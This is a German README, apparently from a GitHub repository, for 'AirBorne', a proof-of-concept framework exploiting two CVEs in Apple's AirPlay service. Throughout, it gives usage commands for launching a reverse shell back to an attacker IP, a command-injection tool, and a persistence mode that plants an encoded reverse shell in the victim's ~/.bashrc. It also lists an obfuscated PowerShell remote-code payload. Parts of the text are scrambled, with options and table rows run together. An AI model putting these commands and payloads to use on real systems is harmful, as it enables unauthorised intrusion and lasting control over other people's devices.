
PoC für CVE-2025-24252 & CVE-2025-24132
Vollständiges PoC Framework für CVE-2025-24252 & CVE-2025-24132
Von ekomsSavior |
AirBorne ist ein kombiniertes Proof-of-Concept (PoC) Framework, das zwei schwerwiegende Schwachstellen im Apple AirPlay-Dienst adressiert. Es enthält einen vollständigen Crash-Trigger und einen funktionierenden Reverse-Shell-Exploit mit optionaler Persistenz, Listener und mehreren Payload-Formaten – alles in einem Skript.
Auf der Suche nach der Originalversion?
Die Legacy-Edition ist weiterhin imlegacyBranch dieses Repositorys verfügbar.
Um sie auszuchecken:
git checkout legacy
.bashrc-Injection (Linux).git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
Das einzelne Skript airborne.py enthält beide PoCs und die gesamte Logik:
--exploit aus--payload fest--persistentsudo python3 airborne.py --exploit 24252 --interface wlan0
Erfordert ein Interface im Monitor-Modus.
Starten Sie den vollständigen Exploit mit der Standard-Bash-Shell:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
Wählen Sie stattdessen die Python-Shell:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
Aktivieren Sie echte Persistenz auf Linux-Zielen:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
Nur Shell-Befehlseinschleusung
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| Payload | Beschreibung |
|---|---|
bash | Standard-Bash-Reverse-Shell über TCP |
python | Python-basierte Reverse-Shell mit socket und pty |
Bei Verwendung von --persistent hängt das Skript den codierten Reverse-Shell-Payload an die folgende Datei des Ziels an:
~/.bashrc
Dies stellt sicher, dass Ihnen jedes Mal eine Shell zurückgegeben wird, wenn der Benutzer sich anmeldet oder ein Terminal geöffnet wird.
base64 codiert und nach dem Buffer-Overflow ausgeliefert.Dieses Projekt ist ausschließlich für Bildungs-, ethische und autorisierte Forschungszwecke gedacht.
Unbefugte Ausnutzung von Systemen ist illegal und unethisch.
powershell |
| Vollständiger Windows PowerShell RCE-Payload (verschleiert) |